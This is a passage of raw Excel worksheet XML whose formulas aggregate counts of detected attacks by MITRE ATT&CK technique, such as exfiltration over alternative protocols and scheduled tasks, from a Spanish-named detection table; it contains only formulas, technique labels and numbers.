        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>1382</v>
      </c>
      <c r="T16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1327</v>
      </c>
      <c r="U16" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1327 (1382)</v>
      </c>
      <c r="V16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>9</v>
      </c>
      <c r="W16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>878</v>
      </c>
      <c r="Y16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>959</v>
      </c>
      <c r="Z16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>904</v>
      </c>
      <c r="AA16" s="322" t="str">
        <f t="shared" si="3"/>
        <v>904 (959)</v>
      </c>
      <c r="AB16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>9</v>
      </c>
      <c r="AC16" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>878</v>
      </c>
      <c r="AE16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>2287</v>
      </c>
      <c r="AF16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2204</v>
      </c>
      <c r="AG16" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2204 (2287)</v>
      </c>
      <c r="AH16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>13</v>
      </c>
      <c r="AI16" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>878</v>
      </c>
      <c r="AK16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>3246</v>
      </c>
      <c r="AL16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>3108</v>
      </c>
      <c r="AM16" s="322" t="str">
        <f t="shared" si="5"/>
        <v>3108 (3246)</v>
      </c>
      <c r="AN16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>20</v>
      </c>
      <c r="AO16" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>878</v>
      </c>
      <c r="AQ16" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR16" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS16" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT16" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>34</v>
      </c>
      <c r="AX16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>20</v>
      </c>
      <c r="AY16" s="322" t="str">
        <f t="shared" si="7"/>
        <v>20 (34)</v>
      </c>
      <c r="AZ16" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA16" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>20</v>
      </c>
      <c r="BC16" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>1416</v>
      </c>
      <c r="BD16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1347</v>
      </c>
      <c r="BE16" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1347 (1416)</v>
      </c>
      <c r="BF16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>10</v>
      </c>
      <c r="BG16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>878</v>
      </c>
      <c r="BI16" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>3</v>
      </c>
      <c r="BJ16" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK16" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (3)</v>
      </c>
      <c r="BL16" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>2</v>
      </c>
      <c r="BO16" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>1826</v>
      </c>
      <c r="BP16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>1823</v>
      </c>
      <c r="BQ16" s="4" t="str">
        <f t="shared" si="10"/>
        <v>1823 (1826)</v>
      </c>
      <c r="BR16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS16" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>5</v>
      </c>
      <c r="BT16" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU16" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B16,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>912</v>
      </c>
      <c r="BV16" s="292">
        <v>0</v>
      </c>
      <c r="BW16" s="322">
        <v>0</v>
      </c>
      <c r="BX16" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY16" s="12">
        <v>0</v>
      </c>
      <c r="BZ16" s="13">
        <v>0</v>
      </c>
      <c r="CA16" s="394">
        <v>0</v>
      </c>
      <c r="CB16" s="288">
        <v>0</v>
      </c>
      <c r="CC16" s="4">
        <v>0</v>
      </c>
      <c r="CD16" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE16" s="4">
        <v>0</v>
      </c>
      <c r="CF16" s="4">
        <v>0</v>
      </c>
      <c r="CG16" s="13">
        <v>0</v>
      </c>
      <c r="CH16" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A17" s="4">
        <f t="shared" si="13"/>
        <v>15</v>
      </c>
      <c r="B17" s="4" t="str">
        <f>IFERROR(VLOOKUP(A17,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1048</v>
      </c>
      <c r="C17" s="493" t="str">
        <f>IFERROR(VLOOKUP(B17,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="D17" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B17)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E17" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F17" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (12)</v>
      </c>
      <c r="G17" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H17" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I17" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J17" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.5</v>
      </c>
      <c r="L17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M17" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N17" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O17" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P17" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S17" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U17" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.5</v>
      </c>
      <c r="X17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>66</v>
      </c>
      <c r="Z17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>5</v>
      </c>
      <c r="AA17" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (66)</v>
      </c>
      <c r="AB17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC17" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>51</v>
      </c>
      <c r="AF17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>12</v>
      </c>
      <c r="AG17" s="322" t="str">
        <f t="shared" si="4"/>
        <v>12 (51)</v>
      </c>
      <c r="AH17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>10</v>
      </c>
      <c r="AI17" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>3</v>
      </c>
      <c r="AK17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>117</v>
      </c>
      <c r="AL17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>17</v>
      </c>
      <c r="AM17" s="322" t="str">
        <f t="shared" si="5"/>
        <v>17 (117)</v>
      </c>
      <c r="AN17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>15</v>
      </c>
      <c r="AO17" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ17" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR17" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS17" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT17" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>48</v>
      </c>
      <c r="AX17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY17" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (48)</v>
      </c>
      <c r="AZ17" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA17" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.5</v>
      </c>
      <c r="BB17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC17" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>50</v>
      </c>
      <c r="BD17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>4</v>
      </c>
      <c r="BE17" s="4" t="str">
        <f t="shared" si="8"/>
        <v>4 (50)</v>
      </c>
      <c r="BF17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>4</v>
      </c>
      <c r="BG17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI17" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ17" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK17" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL17" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO17" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>9</v>
      </c>
      <c r="BP17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>3</v>
      </c>
      <c r="BQ17" s="4" t="str">
        <f t="shared" si="10"/>
        <v>3 (9)</v>
      </c>
      <c r="BR17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS17" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>3</v>
      </c>
      <c r="BT17" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU17" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B17,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>3</v>
      </c>
      <c r="BV17" s="292">
        <v>0</v>
      </c>
      <c r="BW17" s="322">
        <v>0</v>
      </c>
      <c r="BX17" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY17" s="12">
        <v>0</v>
      </c>
      <c r="BZ17" s="13">
        <v>0</v>
      </c>
      <c r="CA17" s="394">
        <v>0</v>
      </c>
      <c r="CB17" s="288">
        <v>0</v>
      </c>
      <c r="CC17" s="4">
        <v>0</v>
      </c>
      <c r="CD17" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE17" s="4">
        <v>0</v>
      </c>
      <c r="CF17" s="4">
        <v>0</v>
      </c>
      <c r="CG17" s="13">
        <v>0</v>
      </c>
      <c r="CH17" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A18" s="4">
        <f t="shared" si="13"/>
        <v>16</v>
      </c>
      <c r="B18" s="4" t="str">
        <f>IFERROR(VLOOKUP(A18,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1053</v>
      </c>
      <c r="C18" s="493" t="str">
        <f>IFERROR(VLOOKUP(B18,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="D18" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B18)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E18" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F18" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G18" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H18" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I18" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J18" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K18" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L18" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M18" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B18,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>14</v>
      </c>
      <c r="N18" s="322">
